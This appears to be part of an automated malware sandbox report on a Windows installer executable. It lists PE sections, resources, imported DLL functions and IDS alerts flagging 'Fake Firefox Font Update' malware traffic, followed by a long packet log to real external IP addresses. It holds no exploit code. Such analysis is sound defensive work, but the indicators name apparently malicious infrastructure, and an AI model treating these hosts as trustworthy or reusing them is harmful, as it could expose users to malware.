                                                                                .idata0x10c0000x382c0x3a0043c0f118777059b21ad6a5849b132450False0.3096039870689655data5.162977041444552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0x1100000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rdata0x1110000x180x2003f4821d98c8d2f792b0e23905609a7d6False0.05078125data0.17014565200323517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x1120000x628000x62800311b4a37d8ed9c52140c72da613567f9False0.7655679925444162data7.569569397861487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_CURSOR0x112c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                RT_CURSOR0x112d780x134dataEnglishUnited States0.4642857142857143
                                                                                RT_CURSOR0x112eac0x134dataEnglishUnited States0.4805194805194805
                                                                                RT_CURSOR0x112fe00x134dataEnglishUnited States0.38311688311688313
                                                                                RT_CURSOR0x1131140x134dataEnglishUnited States0.36038961038961037
                                                                                RT_CURSOR0x1132480x134dataEnglishUnited States0.4090909090909091
                                                                                RT_CURSOR0x11337c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                RT_BITMAP0x1134b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                RT_BITMAP0x1139980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                RT_ICON0x113a800x20d5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9303985722784057
                                                                                RT_ICON0x115b580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.08392116182572613
                                                                                RT_ICON0x1181000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.11960600375234522
                                                                                RT_ICON0x1191a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22074468085106383
                                                                                RT_STRING0x1196100xc4data0.6224489795918368
                                                                                RT_STRING0x1196d40x258data0.475
                                                                                RT_STRING0x11992c0x250data0.46621621621621623
                                                                                RT_STRING0x119b7c0x438StarOffice Gallery theme l, 1627418368 objects, 1st 0.41388888888888886
                                                                                RT_STRING0x119fb40xa0data0.7125
                                                                                RT_STRING0x11a0540xe4data0.6359649122807017
                                                                                RT_STRING0x11a1380x430data0.394589552238806
                                                                                RT_STRING0x11a5680x39cdata0.3906926406926407
                                                                                RT_STRING0x11a9040x3dcdata0.39271255060728744
                                                                                RT_STRING0x11ace00x360data0.37037037037037035
                                                                                RT_STRING0x11b0400x40cdata0.3783783783783784
                                                                                RT_STRING0x11b44c0x108data0.5113636363636364
                                                                                RT_STRING0x11b5540xccdata0.6029411764705882
                                                                                RT_STRING0x11b6200x234data0.5070921985815603
                                                                                RT_STRING0x11b8540x3c8data0.3181818181818182
                                                                                RT_STRING0x11bc1c0x32cdata0.43349753694581283
                                                                                RT_STRING0x11bf480x2a0data0.41964285714285715
                                                                                RT_RCDATA0x11c1e80x82e8dataEnglishUnited States0.11261637622344235
                                                                                RT_RCDATA0x1244d00x10data1.5
                                                                                RT_RCDATA0x1244e00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                RT_RCDATA0x125ce00x6b0data0.647196261682243
                                                                                RT_RCDATA0x1263900x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                RT_RCDATA0x12bea00x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                RT_RCDATA0x12bfc80x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                RT_RCDATA0x12c36c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                RT_RCDATA0x12c68c0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                RT_RCDATA0x12c98c0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                RT_RCDATA0x12cf680x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                RT_RCDATA0x12d3cc0x2057Delphi compiled form 'TWizardForm'0.2298586785843701
                                                                                RT_GROUP_CURSOR0x12f4240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                RT_GROUP_CURSOR0x12f4380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                RT_GROUP_CURSOR0x12f44c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                RT_GROUP_CURSOR0x12f4600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                RT_GROUP_CURSOR0x12f4740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                RT_GROUP_CURSOR0x12f4880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                RT_GROUP_CURSOR0x12f49c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                RT_GROUP_ICON0x12f4b00x3edataEnglishUnited States0.8064516129032258
                                                                                RT_VERSION0x12f4f00x15cdataEnglishUnited States0.5689655172413793
                                                                                RT_MANIFEST0x12f64c0x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                DLLImport
                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                msimg32.dllAlphaBlend
                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                comctl32.dllInitCommonControls
                                                                                kernel32.dllSleep
                                                                                oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                ole32.dllCoDisconnectObject
                                                                                advapi32.dllAdjustTokenPrivileges
                                                                                oleaut32.dllSysFreeString
                                                                                DescriptionData
                                                                                FileDescriptionSetup/Uninstall
                                                                                FileVersion51.1052.0.0
                                                                                Translation0x0000 0x04b0
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2025-04-13T17:04:55.287739+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970389.169.54.153443TCP
                                                                                2025-04-13T17:05:16.627058+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549692104.21.80.1443TCP
                                                                                2025-04-13T17:05:19.882870+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549694104.21.80.1443TCP
                                                                                2025-04-13T17:05:21.701529+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549697104.21.80.1443TCP
                                                                                2025-04-13T17:05:24.042700+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549698104.21.80.1443TCP
                                                                                2025-04-13T17:05:28.598364+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549699104.21.80.1443TCP
                                                                                2025-04-13T17:05:29.956435+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549700104.21.80.1443TCP
                                                                                2025-04-13T17:05:31.688199+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549701104.21.80.1443TCP
                                                                                2025-04-13T17:05:33.613012+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549702104.21.80.1443TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 13, 2025 17:05:16.380281925 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.380338907 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:16.380420923 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.381814003 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.381845951 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:16.626966953 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:16.627058029 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.633158922 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.633187056 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:16.633605003 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:16.678215027 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.683546066 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.683588982 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:16.683698893 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446377039 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446432114 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446465969 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446501970 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446528912 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.446537018 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446554899 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446569920 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.446588993 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446597099 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.446600914 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.446682930 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.446700096 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.447483063 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.447520018 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.447561979 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.447566986 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.447602987 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.590181112 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590439081 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590511084 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.590528965 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590559006 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590670109 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.590704918 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590800047 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590889931 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.590939999 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.590955019 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591006994 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591020107 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591109991 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591171980 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591182947 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591267109 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591320038 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591331005 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591419935 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591474056 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591485023 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591573000 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591625929 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591635942 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591703892 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.591815948 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.591826916 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.592618942 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.592672110 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.592683077 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.592776060 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.592866898 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.595684052 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.595719099 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:17.595745087 CEST49692443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:17.595758915 CEST44349692104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.643099070 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.643148899 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.643201113 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.643814087 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.643824100 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.882770061 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.882869959 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.897284031 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.897299051 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.897862911 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.935307026 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.935457945 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.935486078 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:19.935554981 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:19.976278067 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:20.813874006 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:20.813991070 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:20.814032078 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:20.818531990 CEST49694443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:20.818542957 CEST44349694104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.465120077 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.465176105 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.465307951 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.465761900 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.465775967 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.701404095 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.701529026 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.702697992 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.702706099 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.702956915 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.704632044 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.704632044 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.704664946 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:21.704809904 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:21.752283096 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:22.192599058 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:22.192719936 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:22.192812920 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:22.196239948 CEST49697443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:22.196264982 CEST44349697104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:23.803025961 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:23.803069115 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:23.803143024 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:23.804239988 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:23.804261923 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.042587996 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.042700052 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.047373056 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.047386885 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.048338890 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.052246094 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.052371025 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.052405119 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.052485943 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.052495956 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.559075117 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.559278965 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:24.559372902 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.559464931 CEST49698443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:24.559484005 CEST44349698104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.354223013 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.354300976 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.354412079 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.354795933 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.354818106 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.598217964 CEST44349699104.21.80.1192.168.2.5
                                                                                Apr 13, 2025 17:05:28.598364115 CEST49699443192.168.2.5104.21.80.1
                                                                                Apr 13, 2025 17:05:28.599693060 CEST49699443192.168.2.5104.21.80.1
